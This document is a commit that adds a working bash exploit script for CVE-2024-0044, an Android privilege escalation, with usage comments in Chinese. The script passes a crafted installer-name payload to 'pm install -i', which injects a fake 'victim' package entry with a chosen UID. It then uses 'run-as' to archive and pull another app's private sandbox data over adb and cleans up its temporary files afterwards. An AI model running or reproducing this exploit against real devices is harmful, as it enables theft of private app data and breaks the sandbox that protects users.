Create CVE-2024-0044.sh

init submit

CVE-2024-0044.sh

@@ -0,0 +1,49 @@
+#!/bin/bash
+: <<'EOF'
+利用 CVE-2024-0044 Android 权限提升下载任意目标App沙箱文件。
+author by Re13orn
+
+用法:
+    ./CVE-2024-0044.sh <apk_path> <package_name>
+
+参数:
+    <apk_path>     任意一个本地 APK 文件的路径
+    <package_name> 应用包名
+
+示例:
+    ./CVE-2024-0044.sh /path/to/target.apk com.target.mobile
+EOF
+
+# 从命令行获取变量
+APK_PATH=$1
+PACKAGE_NAME=$2
+
+# 检查是否提供了必要的参数
+if [ -z "$APK_PATH" ] || [ -z "$PACKAGE_NAME" ]; then
+    echo "Usage: $0 <any_apk_path> <target_package_name>"
+    exit 1
+fi
+
+# 创建临时过程目录、创建文件并设置权限
+adb shell "mkdir -p /data/local/tmp/tempqazmkp/ && touch /data/local/tmp/tempqazmkp/$PACKAGE_NAME.tar && chmod -R 0777 /data/local/tmp/tempqazmkp/"
+# 推送任意APK文件到设备临时目录
+adb push $APK_PATH /data/local/tmp/tempqazmkp/any.apk
+
+PAYLOAD="@null
+victim 10149 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
+# 提权并拷贝沙箱文件到指定位置
+adb shell <<EOF
+PAYLOAD="$PAYLOAD"
+pm install -i "\$PAYLOAD" /data/local/tmp/tempqazmkp/any.apk && \
+run-as victim sh -c 'tar -cf /data/local/tmp/tempqazmkp/$PACKAGE_NAME.tar $PACKAGE_NAME'
+EOF
+
+# # 获取文件大小
+filesize=$(adb shell "du -s /data/local/tmp/tempqazmkp/$PACKAGE_NAME.tar" | awk '{print $1}')
+echo "Downloading file: $PACKAGE_NAME.tar (size: $filesize bytes)"
+
+# 下载沙箱文件到本地
+adb pull /data/local/tmp/tempqazmkp/$PACKAGE_NAME.tar .
+
+# 删除临时文件和目录
+adb shell "rm -rf /data/local/tmp/tempqazmkp/"